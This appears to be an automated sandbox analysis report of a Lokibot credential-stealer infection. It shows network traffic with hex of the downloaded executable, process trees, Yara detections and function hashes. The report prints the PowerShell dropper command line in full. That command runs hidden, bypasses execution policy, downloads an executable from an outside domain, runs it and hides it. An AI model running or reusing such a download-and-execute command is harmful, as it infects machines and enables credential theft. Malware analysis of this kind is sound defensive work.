2024-10-03 07:20:41 UTC	658	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:20:41 GMT Content-Type: application/octet-stream Content-Length: 371712 Connection: close Last-Modified: Thu, 03 Oct 2024 07:01:39 GMT ETag: "66fe4153-5ac00" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3hw4SrOTL%2FNS50YCxPQncMHuOUvzoVThUOFMFQJpS1m20QhCuac0Hgv1UMSafPlG55UmAv%2BfKBqW6n2g8M3JXLw25QV0tZGaksYKW2sTWBfzeoOLG39ZxJ%2Buo529C01wTtmKU1u3J6jG4DDLewNBPjLwpl1MBO7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb2bc998ac41fe-EWR
2024-10-03 07:20:43 UTC	1369	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 51 41 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 00 00 00 fc 04 00 00 00 00 00 0a 20 06 00 00 20 05 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQAf @ @`
2024-10-03 07:20:43 UTC	1369	IN	Data Raw: ca 63 ba 8a b1 fb e3 e9 7e d3 60 b1 b1 b6 91 0e 7c 8c 1c bd 1f 93 eb 21 06 51 ba 7b 98 6b 27 fc 87 36 bf 79 f0 48 f5 48 bc a0 ab 12 1d 1a 81 eb d5 1e 12 83 43 65 ec 17 a6 6b 8b a9 c8 93 a4 1b 96 bc 2e fc 8d b3 54 6d 63 0f cc 30 fa d8 fc ce 32 8a c5 65 af 49 d7 c1 0b d5 84 25 85 9a ad 78 73 9e a4 6b 95 32 e1 16 2b a1 d9 ff 20 91 d9 6b 69 f6 43 0f ad 33 a6 83 47 c5 74 70 93 ea 20 33 11 8d fd c8 31 dc 1f 4f 72 78 73 c9 04 25 66 d2 c1 33 d9 72 57 b0 ea 14 e6 a0 16 7e 6d 53 0f 3a 92 8c 23 e3 42 4a cf 14 f7 1d 98 98 bb 0e b3 59 a0 74 77 d6 c2 0d 10 2c 6c c4 d6 20 3a 91 a4 8e c4 05 67 35 6a f6 f4 81 10 dd 41 96 40 be 79 cf 4c 09 bc ea 5e 73 cb 40 30 e6 fa 56 97 00 a3 04 42 48 67 70 51 46 be 24 59 73 56 d7 34 dd 47 be 12 db c3 a7 1d b7 1a 0a 2e fc a7 90 0b bc d7 Data Ascii: c~`\|!Q{k'6yHHCek.Tmc02eI%xsk2+ kiC3Gtp 31Orxs%f3rW~mS:#BJYtw,l :g5jA@yL^s@0VBHgpQF$YsV4G.
2024-10-03 07:20:43 UTC	1369	IN	Data Raw: 72 1c ac d0 e9 85 28 86 2f a5 02 c8 5f b6 6c 70 f3 86 51 b2 eb e9 6a 09 b4 1a bd 32 c3 5b 54 49 e6 87 9a f5 49 6f 8a f6 fd f2 5f c0 94 08 f7 d8 48 0e 01 c5 e6 61 03 86 dc 94 53 76 b2 02 fa 58 c9 12 4c 5e 35 b3 ec 47 46 a9 3f 61 57 b7 6b aa d9 cb a7 52 27 ae 77 66 40 77 a7 f5 6f e2 0f f7 8d 36 3e d5 07 cc 1e ae df f8 18 d6 ca 69 b7 81 61 96 87 e3 00 b6 bc 02 06 d3 a2 f9 4d e2 60 7e 5a 39 24 0e 2e 16 62 90 be 14 ec f7 a7 fe db ad fe 57 b0 69 33 7a 8d 6f 03 97 9b 7e bc d0 83 d6 5e 1d 84 eb 9a cf d4 58 bc 13 80 08 16 52 26 f7 b4 9e cd 1e 41 80 32 29 79 3b 60 0b af 8b d7 1c 94 32 67 03 8c 34 3c 15 c4 ca 1a 6b 0c db d1 1c 23 86 6d 9a 51 f7 93 96 20 99 7f 21 b1 7f 70 20 0c 80 69 0a 59 8a cf 20 8b 34 16 f6 76 ec d6 9d 3b f8 32 04 96 ea 64 24 f2 25 91 a3 2e 52 37 Data Ascii: r(/_lpQj2[TIIo_HaSvXL^5GF?aWkR'wf@wo6>iaM`~Z9$.bWi3zo~^XR&A2)y;`2g4<k#mQ !p iY 4v;2d$%.R7
2024-10-03 07:20:43 UTC	1369	IN	Data Raw: 35 29 29 0c 56 42 b0 f5 e8 49 54 1c 9f aa 83 df 95 4c b5 21 31 5a 48 a7 85 38 aa ec a7 0b 3a 78 a7 4d be 14 9a c2 d5 04 32 ad 20 2e c2 65 84 fc 98 ea 33 19 33 75 01 87 34 f7 a9 3d b0 ab fa c2 fe 5a 7e 12 8d 76 3c c9 45 92 7d ce 43 66 61 f0 64 29 7b da 89 d5 09 32 b7 0f 2c f5 22 bf 45 cd 97 49 b3 fc e6 43 0d c3 d6 31 34 b4 cd dc 2e a5 a8 6d a7 a3 06 fa c9 07 d7 c7 ff cd e3 d1 08 64 ca 69 93 89 4c f1 fb 8c 3b b0 f7 47 2a 77 2b 25 30 77 8d 01 3b 76 65 fb 4d 88 3b a2 e4 b0 09 c2 fb 26 e2 ab af fc e5 61 3e b5 e0 c5 f1 1b f9 3d 11 1f f6 50 9e 13 e3 37 0c a1 b8 e1 cd 3d 8f 63 c9 41 17 c3 af a2 3e cf ed ca ab 47 f2 f8 b6 22 9c b5 0e 55 48 24 48 cc 89 9e a9 47 d9 11 a2 83 15 c4 ed 5a 63 55 00 55 78 df 78 b1 46 9c 83 49 c9 4d 83 50 16 35 0f 2f 75 6b 9a 5f bc a2 32 Data Ascii: 5))VBITL!1ZH8:xM2 .e33u4=Z~v<E}Cfad){2,"EIC14.mdiL;G*w+%0w;veM;&a>=P7=cA>G"UH$HGZcUUxxFIMP5/uk_2
2024-10-03 07:20:43 UTC	58	IN	Data Raw: 3f 82 03 0e 15 94 9a 1a 4b ad e0 8b 5e 46 ae 57 90 5b fb 27 b0 e2 c9 55 80 ea f9 29 57 6d d6 c8 44 14 57 42 b2 a0 a5 73 2f 58 1a bc f5 d0 4d 1c 6c a1 c3 1f 1b 58 ac ba 0f 47 Data Ascii: ?K^FW['U)WmDWBs/XMlXG
2024-10-03 07:20:43 UTC	1369	IN	Data Raw: df d1 f4 d8 01 c4 d0 dc 7c 5b c3 46 8f 2c c0 7a b7 b7 98 a8 75 6b 4d 70 cb 53 60 73 c5 cb f7 57 17 82 cb de f0 dc f2 68 27 88 0f c3 04 22 c2 a2 7b 37 17 ee e7 da 66 02 6b d6 4e 2b a9 81 bb 57 b2 2a f9 d5 36 50 84 e1 59 77 cb 2f 92 40 48 3c 67 22 e9 fa d1 c9 92 e0 ae bb 63 ff fb e6 d4 5e 76 1b 50 85 2e b5 6d a4 99 a3 80 27 e4 ac 58 91 27 97 28 82 4a 25 6d b8 43 78 3b 2f dd c5 42 97 d2 e3 a9 a3 ef 5b d8 17 48 30 2d 7d 89 8d 61 71 6a 93 42 dd 94 4a ef 2b ac 1c 61 19 0b d5 b0 af 42 46 be 76 09 f8 ee 77 70 7e 66 0a 9d 75 69 b4 d8 94 b6 92 ad 24 42 a8 69 a5 da 3b c6 f5 49 d9 56 63 94 a2 57 68 64 4c 3a d2 37 ea 61 f4 69 e8 4a 62 db ed dc 15 5e 47 a0 f8 38 e5 19 cc 38 ff a2 ad b9 b8 49 d5 4b 86 a1 a8 7e 29 af 2e 12 75 3a fc 0b 97 e7 54 55 14 69 bd db bd 7c 1b c9 Data Ascii: \|[F,zukMpS`sWh'"{7fkN+W*6PYw/@H<g"c^vP.m'X'(J%mCx;/B[H0-}aqjBJ+aBFvwp~fui$Bi;IVcWhdL:7aiJb^G88IK~).u:TUi\|
2024-10-03 07:20:43 UTC	1369	IN	Data Raw: 8f 0f 07 56 bc 7d b4 ba 10 88 80 d2 b2 09 ec 36 ac ea d9 d8 ca 3c ce 04 ca c4 41 f0 80 b0 d5 42 f7 c6 a8 1f a9 d1 b5 e9 55 6d 39 78 3f 4e a6 24 73 05 36 62 20 fe be 64 2f b4 ed 94 d6 b8 ae 2f 81 5b 55 fd e0 2a fd 5c 9a 7e 0d 5a fb a1 57 cd da 1e 04 fe c2 40 2e dc 55 92 a5 47 7a 63 91 86 b5 d0 80 c7 18 4d a8 c9 89 10 e2 ce ce c6 36 c7 4c 42 ef d5 c8 50 97 ef 91 48 01 ab f5 1d 38 87 7c 8a ec 8a b2 b0 25 56 9b 07 3c 93 43 26 d6 fd 1b 11 90 af 4f 63 55 c7 9c 30 0b bc f2 ae a7 54 a4 e7 c5 93 f0 22 14 d8 15 c2 13 b8 36 88 45 ef 2c 9b b3 8f a2 32 ee 19 74 d0 61 6f 17 79 96 b5 94 f4 f9 e3 71 d4 8e 09 b3 6c 90 46 4d 9b 05 14 cc e4 27 3e a4 ac b8 61 a3 c2 2c af fb 49 0b 11 50 a1 0e a1 86 bc d2 34 2f 34 ff 7d aa f7 a9 88 f7 35 bd 94 c7 46 7a d8 37 d4 3e e9 9f 72 6a Data Ascii: V}6<ABUm9x?N$s6b d//[U*\~ZW@.UGzcM6LBPH8\|%V<C&OcU0T"6E,2taoyqlFM'>a,IP4/4}5Fz7>rj
2024-10-03 07:20:43 UTC	1369	IN	Data Raw: f9 bf ef fd c2 30 82 01 76 8f 9d be 6d e5 fd ce aa 03 e4 66 48 7d cc d5 ba 8e de 91 13 b3 eb 81 a4 2a 09 00 54 06 ae 3a 99 25 9c 7f 58 5f f0 1b cb 1c f6 f4 52 65 c7 9e e7 d3 3e 2e a9 85 93 ba 22 64 fe 73 f8 5e 19 29 88 6a f9 5e 8a 2c 1b f5 85 93 ed 65 33 16 51 d1 2a c9 7a 75 d8 ad 78 83 2e 5a 6d 87 e4 83 7c 98 dc f0 7b 18 5f 2b 62 8d a4 7b e4 1d 08 75 28 62 59 10 78 9a c1 04 2a 8c 14 90 a5 0a 04 a9 fb ff 27 dd c9 56 1e ff 1b c4 95 ec 72 9e d5 53 61 fd 7a b6 23 bd da f9 3e a1 3d 81 96 df 53 89 a1 f6 68 5c e4 69 df 79 e9 95 46 ab 0f 42 ab 45 3d 54 b0 07 58 fe e2 c3 03 90 7a 74 d7 86 16 55 d6 62 d8 dd 2d b9 cf 5c 40 d8 7e 0f 10 2d ef 24 ee 36 3c 37 51 f3 b8 6c b3 06 db 56 bb 59 cf 14 73 03 83 8c 79 4c 0d 69 e3 6f e9 63 4e 3b 5b 4d ad cb 19 13 8b 4e d3 13 36 Data Ascii: 0vmfH}T:%X_Re>."ds^)j^,e3Qzux.Zm\|{_+b{u(bYx*'VrSaz#>=Sh\iyFBE=TXztUb-\@~-$6<7QlVYsyLiocN;[MN6
2024-10-03 07:20:43 UTC	237	IN	Data Raw: 9c eb 54 90 59 e1 55 9a 2c bc 53 bf 5b 29 20 aa 59 bb eb fa 71 bb e8 28 cb 1c da 26 57 26 bd 5a 27 f9 93 24 62 f4 48 7f b5 91 ba d6 d9 e3 01 3e af cb fe 62 c4 1d 7a e7 e0 0e da af 08 66 76 86 fd 0c 3b e3 18 64 5b c1 e9 42 73 8d ae 9e e0 0d 23 34 d5 b4 5f 39 5d df c2 17 cb 49 73 dc ea 1b 1d c1 d2 e6 cc f2 a2 7a 4d a9 53 2e 16 5b 79 16 ba ad 8a 4b d3 af d8 b2 5a c7 bc f4 2e 28 d3 ac 3e f9 17 7a 3c 7f bc 3c ff 16 50 22 14 06 a2 90 fd a4 51 f4 0c 3a 6b bd 7f b6 9c 22 91 1c f3 2e 3d 66 07 9f 4c 1e 8c bc 19 29 6f 5f 03 00 6d ee cd db ac 50 3f be 33 b3 04 b4 b4 b9 ea 3a 03 e1 81 94 ef 4f 12 52 2d e3 d1 a2 6f bd 3b e1 97 32 0c 0e 8d 39 8d 0f 54 8f cd ea 6a e1 3d 98 f0 5b 1c 06 64 04 67 23 c2 a4 b9 4d 44 00 fe Data Ascii: TYU,S[) Yq(&W&Z'$bH>bzfv;d[Bs#4_9]IszMS.[yKZ.(>z<<P"Q:k".=fL)o_mP?3:OR-o;29Tj=[dg#MD
2024-10-03 07:20:43 UTC	1369	IN	Data Raw: e9 0b ce 29 21 fe 5a 1b 8a 8a 20 c4 5b a9 a3 2e 68 1d 66 94 8c ee be 15 3a 54 92 9b d3 ba 31 5a 9a ef 73 bc 1a 0b cc 38 56 75 52 b8 54 bd cd cf e6 d2 e1 8e 84 f9 99 e0 fc b8 65 dc 43 08 0c 90 cf b6 85 c1 78 a2 6f b3 74 4f e9 a5 fe 74 bd af fd 35 cf 4d 8c 5a a6 fb 4a 8b 95 e4 63 48 b9 dd 26 57 bf 10 71 41 43 7e 00 45 d1 fa ee bd 43 03 bb a6 d9 b5 c1 65 c2 aa 33 a1 ca 83 b4 18 e2 51 6f 17 77 dd 23 9d fe b3 59 f6 87 3e d0 be 93 66 31 41 d5 10 a6 c7 b8 0a 31 81 76 66 8b 28 2f 25 fa db 9c 83 fe e7 5d f6 2f 12 d1 9d ee b6 d7 34 7d d5 5b f4 9c 45 23 d6 8f ac ab ea 9a 6b 06 1d 72 5d 81 71 4c 9a 30 97 b2 b5 6b 4e f7 3e 1f d4 bc 5a a8 c6 42 73 ff e8 cf bf 72 e9 db 68 b3 17 5f 0e 84 9f ae f9 bb 71 ac 22 22 c2 f2 74 c2 2c 6d e0 7c 75 25 b0 d0 61 ac 49 5c ef 9d 1b de Data Ascii: )!Z [.hf:T1Zs8VuRTeCxotOt5MZJcH&WqAC~ECe3Qow#Y>f1A1vf(/%]/4}[E#kr]qL0kN>ZBsrh_q""t,m\|u%aI\

Target ID:	0
Start time:	03:20:36
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:20:36
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:20:39
Start date:	03/10/2024
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\OpenWith.exe"
Imagebase:	0x7ff64cf40000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:20:45
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\mjtjewi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mjtjewi.exe"
Imagebase:	0xb70000
File size:	371'712 bytes
MD5 hash:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:20:46
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\mjtjewi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\mjtjewi.exe
Imagebase:	0x5e0000
File size:	371'712 bytes
MD5 hash:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:20:46
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\mjtjewi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\mjtjewi.exe
Imagebase:	0x7d0000
File size:	371'712 bytes
MD5 hash:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:20:46
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\mjtjewi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\mjtjewi.exe
Imagebase:	0x790000
File size:	371'712 bytes
MD5 hash:	DB94D5DF4ADD0A06F261EAE73C2DA5DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00007FFE7DE733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1508795811.00007FFE7DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7de70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: be9635b1fa0346cf1be8f7100ae550e67fd61efe711796e5b232e631baab43a0
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 6501677111CB0C4FD794EF0CE451AA5B7E0FB95364F10056EE59AC36A1DA36E882CB45

Function 00007FFE7DF4090E Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509161917.00007FFE7DF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e8f63a1a25da0154e92a7b99c2b540909617016b76997e1fb57db787351310
Instruction ID: e10804853914b60bb55ef97f4f85482f2db829bbc2de651322746a00af99acf1
Opcode Fuzzy Hash: 13e8f63a1a25da0154e92a7b99c2b540909617016b76997e1fb57db787351310
Instruction Fuzzy Hash: 3FF09631B1D5094EF2ADA61CA4452BD73D2EF84325B54457AE01DC27B7DD25A8424601

Function 00007FFE7DF40936 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509161917.00007FFE7DF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d35321487d1656f6909c40955abb88c8d6177b1727dace5425e62687eb15297
Instruction ID: f7e29a86209f022fa08cc1d0e8c108b543f7d43423ab2acf9108dc263d91d767
Opcode Fuzzy Hash: 8d35321487d1656f6909c40955abb88c8d6177b1727dace5425e62687eb15297
Instruction Fuzzy Hash: C3F06532B2C6198EE77DA728A4450F8B3D1FB45225B54057AE01DD3672EE36A843C644

Function 00007FFE7DF414D7 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509161917.00007FFE7DF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ab170cc4826846ce44fb0d045ca6d720f230907ab75603e1623e65a318dc8f
Instruction ID: 5fd592e3d7c63466a94b65af23ba1e747c0f6732c36e440c1918f9061763570a
Opcode Fuzzy Hash: 26ab170cc4826846ce44fb0d045ca6d720f230907ab75603e1623e65a318dc8f
Instruction Fuzzy Hash: A7D01720B2AA8A0AF6AEA628102537C50D3EF88251B64803EA04EC27FBDC2898410340

Function 00007FFE7DF414FF Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509161917.00007FFE7DF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffe7df40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e20a444f661b15dd15d32ff12d479a496e10151ae950e985caf5baf7cf1fc4
Instruction ID: 3e2aec1d5a73d0f7e2ce563b2053e056d3d30376fbec430cb9e0972ca6859dd1
Opcode Fuzzy Hash: 95e20a444f661b15dd15d32ff12d479a496e10151ae950e985caf5baf7cf1fc4
Instruction Fuzzy Hash: 73C01230F25A4D4FD7BAA334001427890D2BF492057504478800EC36F5FD3D9802C340

Analysis Process: mjtjewi.exePID: 6956, Parent PID: 4552COMMON

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	18.3%
Total number of Nodes:	327
Total number of Limit Nodes:	13

Executed Functions

Function 015246C0 Relevance: 6.6, Strings: 5, Instructions: 302
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

i4t:, xrefs: 0152481B
D|zJ, xrefs: 015249DF
D|zJ, xrefs: 015249E6
>,9$, xrefs: 01524952
>,9$, xrefs: 01524959

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID: >,9$$>,9$$D|zJ$D|zJ$i4t:
API String ID: 0-3823586563
Opcode ID: 5c9436d1091b551b6e963cc83afc3b96006af0935b3cab63a408bfe01e76712e
Instruction ID: 2e9e77e56b1aef67bdef980437e78f1433830be3718badedae811b213cc1c748
Opcode Fuzzy Hash: 5c9436d1091b551b6e963cc83afc3b96006af0935b3cab63a408bfe01e76712e
Instruction Fuzzy Hash: 7BD13975E0521ADFCB04CFA9C4808AEFBF2FF8A300B55D559D516AB258D734AA42CF90

Function 02DF92B9 Relevance: 4.1, Strings: 3, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

qM$G, xrefs: 02DF9720
i,(, xrefs: 02DF9394
[v[, xrefs: 02DF95DC

Memory Dump Source

Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd

Similarity

API ID:
